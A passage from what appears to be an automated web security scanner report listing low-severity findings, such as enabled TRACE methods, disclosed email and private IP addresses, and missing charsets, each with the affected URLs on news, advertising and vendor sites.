18.104. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Right
18.105. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Top
18.106. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Bottom
18.107. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Middle
18.108. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Right
18.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Top
18.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Bottom
18.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Right
18.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Top
18.113. http://omg.yahoo.com/
18.114. http://omg.yahoo.com/photos/what-were-they-thinking/5203
18.115. http://pro.tweetmeme.com/button.js
18.116. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
18.117. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D
18.118. http://squirrelmail.org/index.php
18.119. http://squirrelmail.org/plugins.php
18.120. http://squirrelmail.org/support/
18.121. http://squirrelmail.org/wiki/MailServerIMAPProblem
18.122. http://us.adserver.yahoo.com/a
18.123. http://weather.yahoo.com/badge/
18.124. http://www-304.ibm.com/support/operations/us/en/invoicespayments
18.125. http://www-304.ibm.com/support/operations/us/en/orderdelivery
18.126. http://www.actvalue.com/
18.127. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp
18.128. http://www.alepo.com/isp-billing.shtml
18.129. http://www.alepo.com/radius-server.shtml
18.130. http://www.alepo.com/wifi.shtml
18.131. http://www.aradial.com/
18.132. http://www.att.com/u-verse/availability/
18.133. http://www.bostonherald.com/mobile/
18.134. http://www.bostonherald.com/mobile/info.bg
18.135. http://www.bostonherald.com/mobile/view.bg
18.136. http://www.bostonherald.com/news/
18.137. http://www.bradsdeals.com/dealsoftheday/subscribe/b
18.138. http://www.courier-mta.org/imap/
18.139. http://www.courier-mta.org/imap/header.html
18.140. http://www.cpanel.net/
18.141. http://www.desktone.com/
18.142. http://www.disenter.com/disenter.css
18.143. http://www.disenter.com/favicon.ico
18.144. http://www.elfqrin.com/hacklab/pages/nntpserv.php
18.145. http://www.facebook.com/plugins/activity.php
18.146. http://www.facebook.com/plugins/facepile.php
18.147. http://www.facebook.com/plugins/likebox.php
18.148. http://www.giganews.com/
18.149. https://www.giganews.com/signup/
18.150. https://www.giganews.com/signup/billing.html
18.151. http://www.ibm.com/developerworks/dwtagg/js/dojo/resources/blank.gif
18.152. http://www.ibm.com/developerworks/forums/thread.jspa
18.153. http://www.ibm.com/developerworks/java/
18.154. http://www.ibm.com/developerworks/java/find/standards/
18.155. http://www.ibm.com/developerworks/niagara/jsp/AuthValid.jsp
18.156. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
18.157. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
18.158. http://www.ibm.com/products/us/en/
18.159. http://www.ibm.com/search/csass/search/
18.160. http://www.ibm.com/us/en/
18.161. http://www.interlinknetworks.com/
18.162. http://www.interlinknetworks.com/applications.htm
18.163. http://www.interlinknetworks.com/pricing.htm
18.164. http://www.interlinknetworks.com/products/on2-4-1radseries.htm
18.165. http://www.interlinknetworks.com/rad.htm
18.166. http://www.interlinknetworks.com/services.htm
18.167. http://www.mailjet.com/
18.168. http://www.mailjet.com/features
18.169. http://www.mailjet.com/pricing
18.170. https://www.mailjet.com/signup
18.171. http://www.mailtraq.com/30day
18.172. http://www.matrix42.com/fileadmin/jScripts/video_box.js
18.173. http://www.mokafive.com/BetterWayVDI
18.174. http://www.mokafive.com/products/compare-mokafive.php
18.175. http://www.mokafive.com/products/products-overview.php
18.176. http://www.mokafive.com/solutions/desktop-and-laptop-management.php
18.177. http://www.mokafive.com/solutions/outsourcing.php
18.178. http://www.mokafive.com/solutions/solutions-overview.php
18.179. http://www.radius-server.net/
18.180. http://www.spotngo.ca/
18.181. http://www.ted.com/
18.182. http://www.ted.com/initiatives
18.183. http://www.ted.com/search
18.184. http://www.ted.com/themes/browse
18.185. http://www.ted.com/webcast/archive/event/ibmwatson
18.186. http://www.thundernews.com/
18.187. http://www.thundernews.com/signup.php
18.188. https://www.thundernews.com/billinginfo.php
18.189. http://www.tmz.com/
18.190. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
18.191. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
18.192. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
18.193. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
18.194. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
18.195. http://www.tmz.com/reset-password/
18.196. http://www.tmz.com/signin/
18.197. http://www.toofab.com/
18.198. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
18.199. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
18.200. http://www.toofab.com/category/celeb-couples/
18.201. http://www.toofab.com/news/
18.202. http://www.usenetbinaries.com/l/newsgroups.html
18.203. http://www.virtuecom.com/
18.204. http://www.westhost.com/images/bluegradbg.gif
18.205. http://www.westhost.com/images/boxtopbackground.gif
19. TRACE method is enabled
19.1. http://72.3.253.234/
19.2. http://ads.pubmatic.com/
19.3. http://afe.specificclick.net/
19.4. http://amch.questionmarket.com/
19.5. http://aud.pubmatic.com/
19.6. http://beta.abc.go.com/
19.7. http://bh.heraldinteractive.com/
19.8. http://bigapple.contextuads.com/
19.9. http://bp.specificclick.net/
19.10. http://cache.specificmedia.com/
19.11. http://cdn.video.abc.com/
19.12. http://cheetah.vizu.com/
19.13. http://dp.33across.com/
19.14. http://gallery.pictopia.com/
19.15. http://image2.pubmatic.com/
19.16. http://imp.fetchback.com/
19.17. http://mi.adinterax.com/
19.18. http://ping.crowdscience.com/
19.19. http://pixel.33across.com/
19.20. http://puma.vizu.com/
19.21. http://q1.checkm8.com/
19.22. http://qa.n7.vp2.abc.go.com/
19.23. http://rt.legolas-media.com/
19.24. http://sensor2.suitesmart.com/
19.25. http://t.mookie1.com/
19.26. http://track.pubmatic.com/
19.27. http://usadmm.dotomi.com/
19.28. http://widgets.outbrain.com/
19.29. http://www.4info.com/
19.30. http://www.kaltura.com/
19.31. https://www.mailjet.com/
19.32. http://www.tmz.com/
20. Email addresses disclosed
20.1. http://a.abc.com/service/gremlin/js/files/s_code.js
20.2. http://advancedvoip.com/
20.3. http://bostonherald.com/news/regional/view.bg
20.4. http://bostonherald.com/projects/your_tax_dollars.bg
20.5. http://bostonherald.com/track/inside_track/view.bg
20.6. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/
20.7. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
20.8. http://cache2-scripts.pressdisplay.com/res/services/ResourceManagerHandler.ashx
20.9. http://duckduckgo.com/d.js
20.10. http://dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js
20.11. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
20.12. http://freeradius.org/faq/cistron.html
20.13. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html
20.14. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html
20.15. http://info.mailtraq.com/wac
20.16. http://l.yimg.com/a/combo
20.17. http://livechat.iadvize.com/chat_init.js
20.18. http://mi.adinterax.com/customer/yahoohouse/4/SapientTest/Yahoo_IM/.ob/IM_425x600.flv.hi.video.mp4
20.19. http://vads.adbrite.com/vast/adserver
20.20. http://vads.adbrite.com/vast/adserver
20.21. http://vads.adbrite.com/vast/adserver
20.22. http://vads.adbrite.com/vast/adserver
20.23. http://vads.adbrite.com/vast/adserver
20.24. http://vads.adbrite.com/vast/adserver
20.25. http://vads.adbrite.com/vast/adserver
20.26. http://vads.adbrite.com/vast/adserver
20.27. http://vads.adbrite.com/vast/adserver
20.28. http://www-01.ibm.com/support/docview.wss
20.29. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html
20.30. http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html
20.31. http://www.alepo.com/javascript/validation.js
20.32. http://www.aradial.com/
20.33. http://www.aradial.com/aradial-radius-server-billing-corporate.html
20.34. http://www.aradial.com/aradial-radius-server-billing-customers.html
20.35. http://www.aradial.com/aradial-radius-server-billing-home-content.html
20.36. http://www.astac.net/
20.37. http://www.astac.net/js/extjs/adapter/jquery/ext-jquery-adapter.js
20.38. http://www.astac.net/js/extjs/ext-all.js
20.39. http://www.astac.net/js/extjs/resources/css/ext-all.css
20.40. http://www.bradsdeals.com/res/opt/global.js
20.41. http://www.desktone.com/
20.42. http://www.desktone.com/sup/js/lib/colorbox/jquery.colorbox-min.js
20.43. http://www.disenter.com/
20.44. http://www.enstarllc.com/
20.45. http://www.google.com/search
20.46. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.dimensions.min.js
20.47. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.hoverIntent.minified.js
20.48. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
20.49. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
20.50. http://www.itoncommand.com/Awards.aspx
20.51. http://www.itoncommand.com/CaseStudies.aspx
20.52. http://www.itoncommand.com/Downloads.aspx
20.53. http://www.itoncommand.com/GetAQuote.aspx
20.54. http://www.itoncommand.com/Login.aspx
20.55. http://www.itoncommand.com/Products.aspx
20.56. http://www.itoncommand.com/Support.aspx
20.57. http://www.itoncommand.com/WhyIToC.aspx
20.58. http://www.itoncommand.com/demo/xxxx_main.html
20.59. http://www.itoncommand.com/hosteddesktop.aspx
20.60. http://www.kaltura.com//api_v3/index.php
20.61. http://www.matrix42.com/downloads/wp-vdi-demystified/
20.62. http://www.matrix42.com/typo3/sysext/cms/tslib/media/scripts/jsfunc.layermenu.js
20.63. http://www.microsenseindia.com/js/jcarousellite_1.0.1.js
20.64. http://www.mitzmara.com/
20.65. http://www.mitzmara.com/media%20relations.htm
20.66. http://www.open.com.au/cgi-bin/sf.cgi
20.67. http://www.open.com.au/howtobuy.html
20.68. http://www.open.com.au/index.html
20.69. http://www.open.com.au/radiator/
20.70. http://www.open.com.au/radiator/downloads.html
20.71. http://www.open.com.au/radiator/evaluation.html
20.72. http://www.open.com.au/radiator/features.html
20.73. http://www.open.com.au/services.html
20.74. https://www.open.com.au/cgi-bin/sf.cgi
20.75. https://www.open.com.au/onlineorder.php
20.76. http://www.radius-server.com/
20.77. http://www.radius-server.com/products.htm
20.78. http://www.radius-server.net/
20.79. http://www.radius-server.net/aradial-radius-server-billing-customers.html
20.80. http://www.radius-server.net/aradial-radius-server-billing-home-content.html
20.81. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
20.82. http://www.radius-server.net/aradial-radius-server-billing-partners.html
20.83. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html
20.84. http://www.radius-server.net/blank-inner.html
20.85. http://www.radius-server.net/radius-billing.html
20.86. http://www.radius.cistron.nl/
20.87. http://www.radius.cistron.nl/README.pam
20.88. http://www.spotngo.ca/
20.89. http://www.spotngo.ca/services.htm
20.90. http://www.ted.com/css/global.css
20.91. http://www.teranews.com/faq.html
20.92. https://www.thundernews.com/common/js/common.js
20.93. http://www.usenetserver.com/en/support.php
20.94. http://www.vm.ibm.com/search/search.cgi
20.95. http://www.westhost.com/js/jquery.hoverIntent.js
21. Private IP addresses disclosed
21.1. http://api.facebook.com/restserver.php
21.2. http://beta.abc.go.com/shows/charlies-angels
21.3. http://beta.abc.go.com/shows/charlies-angels/bios
21.4. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
21.5. http://cdnbakmi.kaltura.com/html5/html5lib/org/mwEmbedLoader.php
21.6. http://external.ak.fbcdn.net/safe_image.php
21.7. http://external.ak.fbcdn.net/safe_image.php
21.8. http://external.ak.fbcdn.net/safe_image.php
21.9. http://external.ak.fbcdn.net/safe_image.php
21.10. http://external.ak.fbcdn.net/safe_image.php
21.11. http://external.ak.fbcdn.net/safe_image.php
21.12. http://external.ak.fbcdn.net/safe_image.php
21.13. http://external.ak.fbcdn.net/safe_image.php
21.14. http://freeradius.org/faq/cistron.html
21.15. http://q1.checkm8.com/adam/detect
21.16. http://q1.checkm8.com/adam/detect
21.17. http://q1.checkm8.com/adam/detect
21.18. http://q1.checkm8.com/adam/detect
21.19. http://q1.checkm8.com/adam/detect
21.20. http://q1.checkm8.com/adam/report
21.21. http://q1digital.checkm8.com/adam/cm8adam_1_call.js
21.22. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css
21.23. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css
21.24. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/tRfGGwGuu8y.css
21.25. http://wiki.freeradius.org/FAQ
21.26. http://www.facebook.com/brandlift.php
21.27. http://www.facebook.com/extern/login_status.php
21.28. http://www.facebook.com/extern/login_status.php
21.29. http://www.facebook.com/extern/login_status.php
21.30. http://www.facebook.com/extern/login_status.php
21.31. http://www.facebook.com/extern/login_status.php
21.32. http://www.facebook.com/extern/login_status.php
21.33. http://www.facebook.com/extern/login_status.php
21.34. http://www.facebook.com/extern/login_status.php
21.35. http://www.facebook.com/extern/login_status.php
21.36. http://www.facebook.com/extern/login_status.php
21.37. http://www.facebook.com/extern/login_status.php
21.38. http://www.facebook.com/extern/login_status.php
21.39. http://www.facebook.com/extern/login_status.php
21.40. http://www.facebook.com/extern/login_status.php
21.41. http://www.facebook.com/extern/login_status.php
21.42. http://www.facebook.com/extern/login_status.php
21.43. http://www.facebook.com/extern/login_status.php
21.44. http://www.facebook.com/extern/login_status.php
21.45. http://www.facebook.com/extern/login_status.php
21.46. http://www.facebook.com/extern/login_status.php
21.47. http://www.facebook.com/plugins/activity.php
21.48. http://www.facebook.com/plugins/activity.php
21.49. http://www.facebook.com/plugins/facepile.php
21.50. http://www.facebook.com/plugins/like.php
21.51. http://www.facebook.com/plugins/like.php
21.52. http://www.facebook.com/plugins/like.php
21.53. http://www.facebook.com/plugins/like.php
21.54. http://www.facebook.com/plugins/like.php
21.55. http://www.facebook.com/plugins/like.php
21.56. http://www.facebook.com/plugins/like.php
21.57. http://www.facebook.com/plugins/like.php
21.58. http://www.facebook.com/plugins/like.php
21.59. http://www.facebook.com/plugins/like.php
21.60. http://www.facebook.com/plugins/like.php
21.61. http://www.facebook.com/plugins/like.php
21.62. http://www.facebook.com/plugins/like.php
21.63. http://www.facebook.com/plugins/like.php
21.64. http://www.facebook.com/plugins/like.php
21.65. http://www.facebook.com/plugins/like.php
21.66. http://www.facebook.com/plugins/like.php
21.67. http://www.facebook.com/plugins/like.php
21.68. http://www.facebook.com/plugins/like.php
21.69. http://www.facebook.com/plugins/like.php
21.70. http://www.facebook.com/plugins/like.php
21.71. http://www.facebook.com/plugins/like.php
21.72. http://www.facebook.com/plugins/like.php
21.73. http://www.facebook.com/plugins/like.php
21.74. http://www.facebook.com/plugins/like.php
21.75. http://www.facebook.com/plugins/like.php
21.76. http://www.facebook.com/plugins/like.php
21.77. http://www.facebook.com/plugins/like.php
21.78. http://www.facebook.com/plugins/likebox.php
21.79. http://www.facebook.com/plugins/likebox.php
21.80. http://www.facebook.com/plugins/likebox.php
21.81. http://www.google.com/sdch/sXoKgwNA.dct
22. Credit card numbers disclosed
22.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml
22.2. http://showadsak.pubmatic.com/AdServer/AdServerServlet
23. Robots.txt file
23.1. http://2912a.v.fwmrm.net/crossdomain.xml
23.2. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js
23.3. http://a.tribalfusion.com/j.ad
23.4. http://abc.go.com/shows/charlies-angels
23.5. http://action.media6degrees.com/orbserv/hbpix
23.6. http://ad.afy11.net/ad
23.7. http://ad.auditude.com/adserver
23.8. http://ad.turn.com/server/ads.js
23.9. http://ad.yieldmanager.com/pixel
23.10. http://adm.fwmrm.net/crossdomain.xml
23.11. http://ads.bluelithium.com/pixel
23.12. http://adserver.teracent.net/tase/ad
23.13. http://alerts.4info.com/alert/ads/dispatcher.jsp
23.14. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php
23.15. http://api.bizographics.com/v2/profile.redirect
23.16. http://api.facebook.com/restserver.php
23.17. http://as.casalemedia.com/j
23.18. http://as1.suitesmart.com/99917/G15493.js
23.19. http://at.amgdgt.com/ads/
23.20. http://attwireless-www.baynote.net/baynote/tags3/common
23.21. http://b.voicefive.com/b
23.22. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3
23.23. http://beta.abc.go.com/shows/charlies-angels
23.24. http://bh.heraldinteractive.com/includes/processAds.bg
23.25. http://bigapple.contextuads.com/fc/go2.php
23.26. http://bostonherald.com/news/regional/view.bg
23.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs
23.28. http://c.betrad.com/a/n/44/546.js
23.29. http://c.brightcove.com/services/viewer/federated_f9
23.30. http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css
23.31. http://cdn.abc.go.com/crossdomain.xml
23.32. http://cdn.gigya.com/JS/gigya.js
23.33. http://cdn.kaltura.com/crossdomain.xml
23.34. http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf
23.35. http://cdn.media.abc.go.com/m/images/global/generic/logo.png
23.36. http://cdn.optmd.com/V2/80181/197812/index.html
23.37. http://cdn.turn.com/server/ddc.htm
23.38. http://cdnbakmi.kaltura.com/p/591531/sp/59153100/flash/kdp3/v3.5.17.6/kdp3.swf
23.39. http://cheetah.vizu.com/a.gif
23.40. http://cim.meebo.com/cim
23.41. http://clk.atdmt.com/go/335787632/direct
23.42. http://cm.g.doubleclick.net/pixel
23.43. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848
23.44. http://d14.zedo.com/ads6/d/3853/172/951/0/2/i.js
23.45. http://d7.zedo.com/img/bh.gif
23.46. http://dp.33across.com/ps/
23.47. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js
23.48. http://g-pixel.invitemedia.com/gmatcher
23.49. http://g.ca.bid.invitemedia.com/pubm_imp
23.50. http://g2.gumgum.com/services/get
23.51. http://gallery.pictopia.com/bostonherald/
23.52. http://gscounters.gigya.com/gs/api.ashx
23.53. http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Monster_RON_728x90/Monster_728x90_FINAL.swf/1297456388
23.54. http://imp.fetchback.com/serve/fb/adtag.js
23.55. http://ll.static.abc.com/m/vp2/sfp/prod/v1.0.0/js/abc/sfp2.js
23.56. http://load.exelator.com/load/
23.57. http://loadm.exelator.com/load/
23.58. http://log.go.com/log
23.59. http://map.media6degrees.com/orbserv/aopix
23.60. http://metrics.tmz.com/b/ss/wbrostmz/1/H.20.3/s31416852392721
23.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75
23.62. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853
23.63. http://odb.outbrain.com/utils/ping.html
23.64. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
23.65. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.755902.s1.v4.ipv6-exp.l.google.com/gen_204
23.66. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
23.67. http://pixel.33across.com/ps/517389/
23.68. http://pixel.invitemedia.com/data_sync
23.69. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml
23.70. http://puma.vizu.com/cdn/00/00/23/91/smart_tag.js
23.71. http://q1.checkm8.com/adam/detect
23.72. http://qa.n7.vp2.abc.go.com/crossdomain.xml
23.73. http://r.casalemedia.com/j.gif
23.74. http://r.turn.com/r/beacon
23.75. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653
23.76. http://r1.zedo.com/log/ERR.gif
23.77. http://rds.yahoo.com/b.gif
23.78. http://rt.legolas-media.com/lgrt
23.79. http://rt1302.infolinks.com/crossdomain.xml
23.80. http://rt1701.infolinks.com/crossdomain.xml
23.81. http://rt1702.infolinks.com/crossdomain.xml
23.82. http://rt1803.infolinks.com/crossdomain.xml
23.83. http://rt1804.infolinks.com/static/blank.html
23.84. http://rt1903.infolinks.com/crossdomain.xml
23.85. http://s0.2mdn.net/2906542/11dvm_quiltednorthern_banners_300x250.swf
23.86. http://sana.newsinc.com/sana.html
23.87. http://search.yahoo.com/search
23.88. http://segment-pixel.invitemedia.com/pixel
23.89. http://sensor2.suitesmart.com/sensor4.js
23.90. http://servedby.flashtalking.com/imp/3/16718
23.91. http://site.abc.go.com/crossdomain.xml
23.92. http://spe.atdmt.com/ds/WURTCBIOGTYS/TYS_WayneDeepa_Banner/TYS219_WayneDeepa_300x250.swf
23.93. http://static-gallery.pictopia.com.edgesuite.net/providerasset/1081/bherald_style.css
23.94. http://stats.kaltura.com/crossdomain.xml
23.95. http://traffic.outbrain.com/network/redir
23.96. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/
23.97. http://us.adserver.yahoo.com/a
23.98. http://usadmm.dotomi.com/dmm/servlet/dmm
23.99. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674
23.100. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif
23.101. http://www.4info.com/js/auto_jump.js
23.102. http://www.att.com/u-verse/availability/
23.103. http://www.bostonherald.com/news/
23.104. http://www.bradsdeals.com/dealsoftheday/subscribe/b
23.105. http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
23.106. http://www.meebo.com/cim/sandbox.php
23.107. http://www.tmz.com/
24. Cacheable HTTPS response
24.1. https://admin.usenetbinaries.com/cgi-bin/signup
24.2. https://admin.usenetbinaries.com/favicon.ico
24.3. https://www.easynews.com/signup/lookit.phtml
24.4. https://www.giganews.com/favicon.ico
24.5. https://www.giganews.com/images/fonts/museo_slab_500-webfont.woff
24.6. https://www.giganews.com/images/fonts/museo_slab_500italic-webfont.woff
24.7. https://www.giganews.com/images/fonts/museosans_500-webfont.woff
24.8. https://www.mailjet.com/signup
24.9. https://www.open.com.au/cgi-bin/sf.cgi
24.10. https://www.open.com.au/favicon.ico
24.11. https://www.open.com.au/onlineorder.php
24.12. https://www.open.com.au/style/osc
24.13. https://www.thundernews.com/favicon.ico
25. Multiple content types specified
26. HTML does not specify charset
26.1. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9
26.2. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106
26.3. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10
26.4. http://ad.doubleclick.net/pfadx/tmz_cim/
26.5. http://ad.yieldmanager.com/iframe3
26.6. http://advancedvoip.com/favicon.ico
26.7. http://advancedvoip.com/images/voip_billing_solution_partner_bp.jpg
26.8. http://aud.pubmatic.com/AdServer/Artemis
26.9. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3
26.10. http://bgs-soft.com/Products_Sgagent.html
26.11. http://bgs-soft.com/sgagent/
26.12. http://bh.heraldinteractive.com/includes/processAds.bg
26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs
26.14. http://ca.rtb.prod2.invitemedia.com/build_creative
26.15. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848
26.16. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html
26.17. http://freeradius.org/
26.18. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
26.19. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
26.20. http://now.eloqua.com/visitor/v200/svrGP.aspx
26.21. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91
26.22. http://odb.outbrain.com/utils/ping.html
26.23. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
26.24. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html
26.25. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
26.26. http://pixel.invitemedia.com/data_sync
26.27. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtalks_maincontent.gif
26.28. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtemplate.gif
26.29. http://sana.newsinc.com/sana.html
26.30. http://search.alepo.com/img/onebyone.gif
26.31. http://secure-us.imrworldwide.com/cgi-bin/m
26.32. http://secure-us.imrworldwide.com/ocr/e
26.33. http://sensor2.suitesmart.com/sensor4.js
26.34. http://showadsak.pubmatic.com/AdServer/AdServerServlet
26.35. http://squirrelmail.org/sflogo.html
26.36. http://static.scanscout.com/optout/iframe.html
26.37. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf
26.38. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782
26.39. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
26.40. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html
26.41. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet
26.42. http://uac.advertising.com/wrapper/aceUACping.htm
26.43. http://widgets.mobilelocalnews.com/
26.44. http://www-03.ibm.com/innovation/us/watson/
26.45. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/index.html
26.46. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/smarter-answers-for-a-smarter-planet.html
26.47. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html
26.48. http://www.advancedvoip.com/favicon.ico
26.49. http://www.advancedvoip.com/images/voip_billing_solution_partner_bp.jpg
26.50. http://www.alepo.com/isp-billing.shtml
26.51. http://www.alepo.com/radius-server.shtml
26.52. http://www.alepo.com/wifi.shtml
26.53. http://www.aradial.com/
26.54. http://www.aradial.com/aradial-radius-server-billing-corporate.html
26.55. http://www.aradial.com/aradial-radius-server-billing-customers.html
26.56. http://www.aradial.com/aradial-radius-server-billing-home-content.html
26.57. http://www.aradial.com/favicon.ico
26.58. http://www.att.com/navservice/navservlet
26.59. http://www.bostonheraldineducation.com/blog-posts.php
26.60. http://www.bostonheraldineducation.com/favicon.ico
26.61. http://www.courier-mta.org/imap/header.html
26.62. http://www.desktone.com/free_trial
26.63. http://www.disenter.com/disenter.css
26.64. http://www.disenter.com/favicon.ico
26.65. https://www.easynews.com/signup/lookit.phtml
26.66. http://www.elfqrin.com/hacklab/pages/nntpserv.php
26.67. http://www.ibm.com/ibm100/us/en/icons/v17-hp.html
26.68. http://www.itoncommand.com/demo/xxxx_main.html
26.69. http://www.radius-server.net/
26.70. http://www.radius-server.net/aradial-radius-server-billing-customers.html
26.71. http://www.radius-server.net/aradial-radius-server-billing-home-content.html
26.72. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
26.73. http://www.radius-server.net/aradial-radius-server-billing-partners.html
